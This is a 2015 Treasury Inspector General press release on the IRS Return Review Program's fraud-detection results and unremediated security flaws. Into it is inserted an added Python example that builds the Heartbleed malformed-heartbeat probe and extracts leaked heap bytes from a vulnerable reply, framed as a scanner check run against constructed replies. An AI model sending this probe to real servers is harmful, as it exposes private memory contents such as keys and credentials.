Treasury Inspector General for Tax Administration
September 22, 2015
TIGTA - 2015-29
Contact: David Barnes
WASHINGTON – The new Return Review Program (RRP) being tested by the Internal Revenue Service (IRS) is enhancing the identification of tax return fraud, but system security needs improvement.
That is the conclusion of a new report publicly released today by the Treasury Inspector General for Tax Administration (TIGTA).
Tax fraud is a major challenge for the IRS. The IRS chartered the initiation of the RRP in 2009 to replace the Electronic Fraud Detection System (EFDS). Development of the RRP entered a strategic pause in January 2014 to allow the IRS time to evaluate the performance and design of the parallel processing database and to revisit strategic business fraud detection goals. The objective of the audit was to determine if the RRP effectively meets requirements and identifies fraudulent tax returns.
TIGTA found that during an IRS pilot, the RRP models flagged potential identity theft fraud not detected by the EFDS models. During a 32-day test, the RRP Identity Theft Model identified 51,946 returns as potential identity theft cases. The IRS confirmed that 41,311 of those returns involved identity theft. Of the confirmed identity theft cases, the IRS determined that 10,348 cases (25 percent), totaling $43 million in refunds, were not detected by the EFDS or the Dependent Database.
In addition, IRS tests showed that eight million returns a day can be loaded to the RRP database as required. For example, over a one-week period the RRP consistently loaded between seven million and nine million returns a day.
However, the IRS classified the RRP as a Level 3 Federal Information Security Management Act system (an information resource rather than a major system). Because of that classification, RRP-specific security issues may not be effectively addressed. In addition, identified security vulnerabilities were not remediated. For example, October 2014 network scans identified two RRP servers that were still vulnerable to the Heartbleed bug (CVE-2014-0160) six months after the vulnerability was publicly disclosed.
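The release does not say how the October 2014 scans established that the two servers were still vulnerable. The following is an added example, not code from the TIGTA report or the IRS, showing the check a network scanner typically performs for Heartbleed: send a TLS HeartbeatRequest whose payload_length field claims far more bytes than the message carries, then see whether the server echoes back that many bytes (leaked heap memory, the OpenSSL 1.0.1 through 1.0.1f behaviour) or, as RFC 6520 requires, discards the malformed request. To stay runnable offline, the server replies here are constructed byte strings rather than captured traffic; the function and constant names are this example's own.

```python
import struct

# TLS record content types and Heartbeat message types (RFC 5246, RFC 6520).
CONTENT_HEARTBEAT = 0x18
CONTENT_ALERT = 0x15
HB_REQUEST = 1
HB_RESPONSE = 2
TLS_1_1 = (3, 2)
MIN_PADDING = 16            # RFC 6520 requires at least 16 bytes of padding


def build_heartbeat_probe(claimed_len=0x4000, version=TLS_1_1):
    """Build the classic Heartbleed probe: a HeartbeatRequest whose
    payload_length field claims `claimed_len` bytes but carries no payload.
    A server that trusts payload_length (OpenSSL 1.0.1 through 1.0.1f) copies
    claimed_len bytes of its own heap into the HeartbeatResponse."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len)
    header = struct.pack("!BBBH", CONTENT_HEARTBEAT, version[0], version[1], len(body))
    return header + body


def parse_record(data):
    """Split one TLS record into (content_type, version, fragment)."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    fragment = data[5:5 + length]
    if len(fragment) != length:
        raise ValueError("truncated TLS record fragment")
    return ctype, (major, minor), fragment


def classify_response(response, claimed_len=0x4000):
    """Decide what the server's reply to build_heartbeat_probe() tells us.
    Returns 'vulnerable', 'not_vulnerable' or 'inconclusive'."""
    if not response:
        # RFC 6520: a request whose payload_length exceeds the fragment
        # MUST be discarded silently, so no reply is the patched behaviour.
        return "not_vulnerable"
    ctype, _, fragment = parse_record(response)
    if ctype == CONTENT_ALERT:
        return "not_vulnerable"
    if ctype != CONTENT_HEARTBEAT or len(fragment) < 3:
        return "inconclusive"
    hb_type, payload_len = struct.unpack("!BH", fragment[:3])
    if hb_type != HB_RESPONSE:
        return "inconclusive"
    # We sent zero payload bytes, so every echoed payload byte beyond the
    # mandatory padding is memory the server should never have disclosed.
    echoed = len(fragment) - 3
    if payload_len == claimed_len and echoed >= claimed_len:
        return "vulnerable"
    return "not_vulnerable"


def leaked_bytes(response, claimed_len=0x4000):
    """Return the heap bytes a vulnerable server echoed (empty otherwise)."""
    if classify_response(response, claimed_len) != "vulnerable":
        return b""
    _, _, fragment = parse_record(response)
    return fragment[3:3 + claimed_len]


# --- Constructed sample replies (not captured traffic) ------------------------

def _constructed_vulnerable_reply(claimed_len=0x4000):
    # Simulated heap: mostly zeros with a planted marker standing in for
    # whatever the process happened to hold in memory at the time.
    heap = bytearray(claimed_len)
    marker = b"[simulated heap contents]"
    heap[100:100 + len(marker)] = marker
    body = struct.pack("!BH", HB_RESPONSE, claimed_len) + bytes(heap) + b"\x00" * MIN_PADDING
    return struct.pack("!BBBH", CONTENT_HEARTBEAT, 3, 2, len(body)) + body


VULNERABLE_REPLY = _constructed_vulnerable_reply()
# Patched server answering with a fatal unexpected_message alert (level 2, description 10).
ALERT_REPLY = struct.pack("!BBBH", CONTENT_ALERT, 3, 2, 2) + bytes([2, 10])
# Patched server that follows RFC 6520 and says nothing at all.
SILENT_REPLY = b""

if __name__ == "__main__":
    print("probe:", build_heartbeat_probe().hex())
    for name, reply in [("vulnerable", VULNERABLE_REPLY), ("alert", ALERT_REPLY), ("silent", SILENT_REPLY)]:
        print(f"{name:>10}: {classify_response(reply)}")
    print("leaked sample:", leaked_bytes(VULNERABLE_REPLY)[100:125])
```

The probe is harmless to a patched server, which is why it is the standard scanner check; the consequence the report is pointing at is that the same probe run against an unpatched server six months after disclosure hands back whatever happens to be in the process heap, and that a scan finding of this kind is expected to be closed within days, not left open across scan cycles.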
“The RRP test results show potential improvements in the IRS approach to prevent, detect, and resolve pre-refund tax fraud,” said J. Russell George, Treasury Inspector General for Tax Administration. “While these potential improvements are encouraging, the IRS must also ensure the system is properly classified and meets security requirements.”
TIGTA recommended that the Chief Technology Officer ensure that: 1) IRS personnel completing the Federal Information Security Management Act system classifications are familiar with the Act’s requirements; 2) the validation of system classification and reclassification is discussed, reviewed, and documented during the biweekly cybersecurity management meeting; and 3) all critical and high-risk RRP vulnerabilities are resolved.
The IRS agreed with TIGTA’s three recommendations. It plans to brief personnel on the Federal Information Security Management Act requirements for each level of classification; enhance its current process for the validation of system classification and reclassification as discussed, reviewed, and documented during the biweekly management meeting; and focus on resolving the critical vulnerabilities in production and then the lower environments.
Note: The difference between the date TIGTA issues an audit report to the Internal Revenue Service and the date TIGTA publicly releases the report is due to TIGTA's internal review process to ensure that public release is in compliance with Federal confidentiality laws.